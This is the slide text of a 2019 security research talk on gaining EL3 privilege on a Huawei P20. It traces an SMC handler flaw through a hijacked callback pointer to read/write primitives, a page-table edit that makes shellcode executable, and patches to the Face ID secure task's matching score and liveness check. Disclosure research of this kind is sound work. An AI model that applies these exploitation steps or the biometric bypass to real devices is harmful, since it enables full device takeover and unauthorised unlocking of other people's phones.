Slide 1

Slide 1 text

EL3 Tour: Get The Ultimate Privilege of Android Phone Guanxing Wen 2019

Slide 2

Slide 2 text

Bio ✤ Senior Security Researcher at Pangu ✤ Exploitation and Reversing Engineering ✤ Recently ✤ Firmware, Bootloader, Kernel ✤ Previously ✤ Adobe Flash

Slide 3

Slide 3 text

Agenda ✤ ARMv8 Privilege mode ✤ Post-startup architecture of Huawei P20 ✤ Hunt EL3 Vulnerabilities ✤ Execute shellcode in EL3 ✤ Face ID Bypass

Slide 4

Slide 4 text

ARMv8 Privilege Mode Linux Kernel Hypervisor Trusted Firmware (No limits: Physical Memory, TTBR0_ELx, VBAR_ELx, …) Trusted Kernel Application Framework Libraries Services Trusted App EL0 EL1 EL2 EL3 Normal World Secure World

Slide 5

Slide 5 text

Huawei P20

Slide 6

Slide 6 text

Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970)

Slide 7

Slide 7 text

Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970) ✤ Android phone with great cameras

Slide 8

Slide 8 text

Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970) ✤ Android phone with great cameras ✤ Customized EL3 and S-EL0 & 1

Slide 9

Slide 9 text

Boot Chain fastboot.img

Slide 10

Slide 10 text

Boot Chain FASTBOOT

Slide 11

Slide 11 text

Boot Chain FASTBOOT trustfirmware.img teeos.img kernel.img

Slide 12

Slide 12 text

Boot Chain Trusted Firmware teeos.img kernel.img EL3

Slide 13

Slide 13 text

Boot Chain Trusted Firmware teeos.img kernel.img EL3

Slide 14

Slide 14 text

Boot Chain Trusted Firmware kernel.img EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0

Slide 15

Slide 15 text

Boot Chain Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0

Slide 16

Slide 16 text

Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World svc

Slide 17

Slide 17 text

Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World smc

Slide 18

Slide 18 text

Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World

Slide 19

Slide 19 text

Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World IPC

Slide 20

Slide 20 text

Interact with Secure World Trusted Firmware EL3

Slide 21

Slide 21 text

ARM Trusted Firmware ✤ https://github.com/ARM-software/arm-trusted-firmware ✤ Switch between Secure and Normal World ✤ Physical Memory Partition ✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, … ✤ Dispatch smc

Slide 22

Slide 22 text

Locate SMC Handler ✤ VBAR_EL3 ida-arm-system-highlight.py

Slide 23

Slide 23 text

✤ VBAR_EL3

Slide 24

Slide 24 text

Dispatched to Trusted Core Trusted Firmware Trusted Core Secure Tasks eret eret

Slide 25

Slide 25 text

ARM Trusted Firmware (ATF) ✤ Switch between Secure and Normal World ✤ Physical Memory Partition ✤ Switch between Secure and Normal World ✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, … ✤ Dispatch SMC ✤ Trusted Core handles most of smc calls, where EL3 handles the rest

Slide 26

Slide 26 text

No content

Slide 27

Slide 27 text

Hunt EL3 Vulnerabilities

Slide 28

Slide 28 text

Running Environment of EL3 SCTLR_EL3

Slide 29

Slide 29 text

Running Environment of EL3 ✤ SCTLR_EL3.WXN = 1 ✤ No-ASLR ✤ No-CFI ✤ SCTLR_EL3.M = 1 ✤ TTBR0_EL3 ✤ Flat Mapping

Slide 30

Slide 30 text

Memory Layout of EL3 Start End Usage Permission 0x16800000 0x1CE00000 R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 ??? R | W 0x5A000000 0xFFFDF000 MMIO R | W FASTBOOT

Slide 31

Slide 31 text

EL1 Kernel as a Start Point ✤ Root Exploit ✤ Purchase an unlock code ✤ Unlock the Bootloader ✤ fastboot flash kernel kernel.img

Slide 32

Slide 32 text

✤ Looking for smc usages EL1 Kernel as a Start Point #define RPMB_SVC_REQUEST_ADDR 0xC600FF04 #define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE 0x209E1000 static int hisi_rpmb_device_init(void) { ...skip... bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE; rpmb_request_phy = bl31_smem_base + data[0]; atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0); ...skip... }

Slide 33

Slide 33 text

✤ Search for SMC usages int atfd_hisi_rpmb_smc(u64 function_id, u64 arg0, u64 arg1, u64 arg2) { asm volatile( __asmeq("%0", "x0") __asmeq("%1", "x1") __asmeq("%2", "x2") __asmeq("%3", "x3") "smc #0\n" : "+r" (function_id) : "r" (arg0), "r" (arg1), "r" (arg2)); return (int)function_id; } EL1 Kernel as a Start Point

Slide 34

Slide 34 text

✤ Looking for smc usages #define RPMB_SVC_REQUEST_ADDR 0xC600FF04 #define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE 0x209E1000 static int hisi_rpmb_device_init(void) { ...skip... bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE; rpmb_request_phy = bl31_smem_base + data[0]; atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0); ...skip... } EL1 Kernel as a Start Point

Slide 35

Slide 35 text

No content

Slide 36

Slide 36 text

No content

Slide 37

Slide 37 text

0xC600FF04 Handler

Slide 38

Slide 38 text

0xC600FF04 Handler

Slide 39

Slide 39 text

if (x0 == 0xC600FF04) { if ((rpmb_request_phy = x1) != 0x209E9000) { NOTICE(“sync kernel and bl31 for a same memory space failed\n”); goto err; } } 0xC600FF04 Handler

Slide 40

Slide 40 text

0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31 = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } }

Slide 41

Slide 41 text

0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31 = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } }

Slide 42

Slide 42 text

0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31 = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); //Both PC and x0 are controlled !!! } }

Slide 43

Slide 43 text

0xC600FF04 Handler History if (x0 == 0xC600FF04) { rpmb_request_phy = x1; } ~2018.3 Ancient

Slide 44

Slide 44 text

0xC600FF04 Handler History if (x0 == 0xC600FF04) { if ((rpmb_request_phy = x1) != 0x209E9000) { ... } } ~2018.3 ~2018.7 Ancient 2018.5

Slide 45

Slide 45 text

0xC600FF04 Handler History if (x0 == 0xC600FF04) { if (x1 != 0x209E9000) { ... } } ~2018.3 ~2018.7 Ancient Contemporary

Slide 46

Slide 46 text

0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) { v31 = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } ~2018.7 Ancient

Slide 47

Slide 47 text

0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) { v31 = rpmb_request_phy + 0x6000; //0x209E0000 is accessible to EL1 if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } ~2018.7 Ancient

Slide 48

Slide 48 text

0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) { v31 = callback_vtable; //inaccessible to EL1 if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } Contemporary ~2018.7 Ancient

Slide 49

Slide 49 text

Control the PC and X0 ✤ Kernel module as smc wrapper ✤ insmod exploit.ko ✤ smc(0xC600FF04, func_pa) ✤ smc(0xC600FF06, param)

Slide 50

Slide 50 text

Control the PC and X0 ✤ Kernel module as smc wrapper ✤ insmod exploit.ko ✤ Tamper [0x209E9000 + 0x6C38] ✤ smc(0xC600FF06, param)

Slide 51

Slide 51 text

Execute Shellcode in EL3

Slide 52

Slide 52 text

x0 = controlled x1 = 0x209xxxxx x2 = 0x1FExxxxx SCTLR_EL3.WXN No ASLR No CFI 0xC600FF06 Handler

Slide 53

Slide 53 text

Write Primitive - Step 1 global_addr = controlled global_len = 0x209xxxxx x0 = controlled x1 = 0x209xxxxx x2 = 0x1FExxxxx

Slide 54

Slide 54 text

Write Primitive - Step 2 global_addr = controlled, global_len = 0x209xxxxx, x0 = controlled, x2 = 0x1FExxxxx

Slide 55

Slide 55 text

x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step 2 global_addr = controlled, global_len = 0x209xxxxx,

Slide 56

Slide 56 text

x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step 2 global_addr = controlled, global_len = 0x209xxxxx,

Slide 57

Slide 57 text

x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step 2 global_addr = controlled, global_len = 0x209xxxxx,

Slide 58

Slide 58 text

Write Primitive - flawed global_addr = controlled, global_len = 0x209xxxxx, x0 = controlled, x2 = 0x1FExxxxx

Slide 59

Slide 59 text

Write Primitive - flawed global_addr = controlled, global_len = 0x209xxxxx, x0 = controlled, x2 = 0x1FExxxxx

Slide 60

Slide 60 text

R & W Primitives VTABLE ptr_function ptr_function ptr_function ptr_function

Slide 61

Slide 61 text

R & W Primitives VTABLE read gadget ptr_function Corrupted ptr_function

Slide 62

Slide 62 text

R & W Primitives xxx_handler(x0, x1, x2, x3) return ptr_func(x2, x3); Kernel Module smc eret

Slide 63

Slide 63 text

R & W Primitives

Slide 64

Slide 64 text

R & W Primitives

Slide 65

Slide 65 text

R & W Primitives ✤ Memory Read ✤ smc(0xC500AA01, addr - 0x18, 0, 0x55BBCCE0 + 1);

Slide 66

Slide 66 text

R & W Primitives ✤ Memory Read ✤ smc(0xC500AA01, addr - 0x18, 0, 0x55BBCCE0 + 1); ✤ Memory Write ✤ smc(0xC500AA01, addr - 8, value, 0x55BBCCE0 + 2);

Slide 67

Slide 67 text

EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shared Memory R | W 0x5A000000 0xFFFDF000 MMIO R | W

Slide 68

Slide 68 text

EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shellcode R | W 0x5A000000 0xFFFDF000 MMIO R | W

Slide 69

Slide 69 text

Page Table

Slide 70

Slide 70 text

Page Descriptor 0x209F8627

Slide 71

Slide 71 text

Page Descriptor 0x209F8 627 000

Slide 72

Slide 72 text

Page Descriptor 627 0|1|1 0|0 0|1|0 0 1 1 1 nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]

Slide 73

Slide 73 text

Page Descriptor

Slide 74

Slide 74 text

Page Descriptor 627 0|1|1 0|0 0|1|0 0 1 1 1 nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]

Slide 75

Slide 75 text

Page Descriptor 627 0|1|1 0|1 0|0|0 0 1 1 1 nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]

Slide 76

Slide 76 text

Invalidate TLB

Slide 77

Slide 77 text

Invalidate TLB

Slide 78

Slide 78 text

Execute Shellcode ✤ Deploy Shellcode at 0x209F8000 ✤ Page Descriptior Modification: 0x209F8627 => 0x209F8783 ✤ TLBI ALLEL3 ✤ Invoke 0x209F8000

Slide 79

Slide 79 text

We are in EL3 ✤ Do whatever you want ✤ Check all those encrypted modules ✤ Modify and debug every peripheral ✤ Nothing is hidden from you anymore

Slide 80

Slide 80 text

Face ID Bypass

Slide 81

Slide 81 text

Become a Faceless Man

Slide 82

Slide 82 text

EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shellcode R | W 0x5A000000 0xFFFDF000 MMIO R | W

Slide 83

Slide 83 text

Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster task_gatekeeper /odm/ta/xxx.sec Normal World Secure World

Slide 84

Slide 84 text

Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster task_gatekeeper /odm/ta/xxx.sec Normal World Secure World

Slide 85

Slide 85 text

Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster task_gatekeeper task_xxx Normal World Secure World

Slide 86

Slide 86 text

Secure Task of Face ID ✤ Dynamic Loaded Trusted Application ✤ /odm/ta/e8014913-e501-4d44-a9d6-058ec3b93b90.sec ✤ TEE_SERVICE_FACE_REC ✤ Search and extract it from physical memory

Slide 87

Slide 87 text

Detection Logic of Face ID ✤ Calculate scores as results of image comparison ✤ secure task covers the entire logic ✤ Liveness detection ✤ Multiple methods (Both secure task and NS-EL0 are involved)

Slide 88

Slide 88 text

Patch Matching Score

Slide 89

Slide 89 text

Patch Matching Score svsprintf log messages to /dev/hisi_teelog

Slide 90

Slide 90 text

Patch Liveness Result

Slide 91

Slide 91 text

Patch Liveness Result

Slide 92

Slide 92 text

No content

Slide 93

Slide 93 text

Thank you @hhj4ck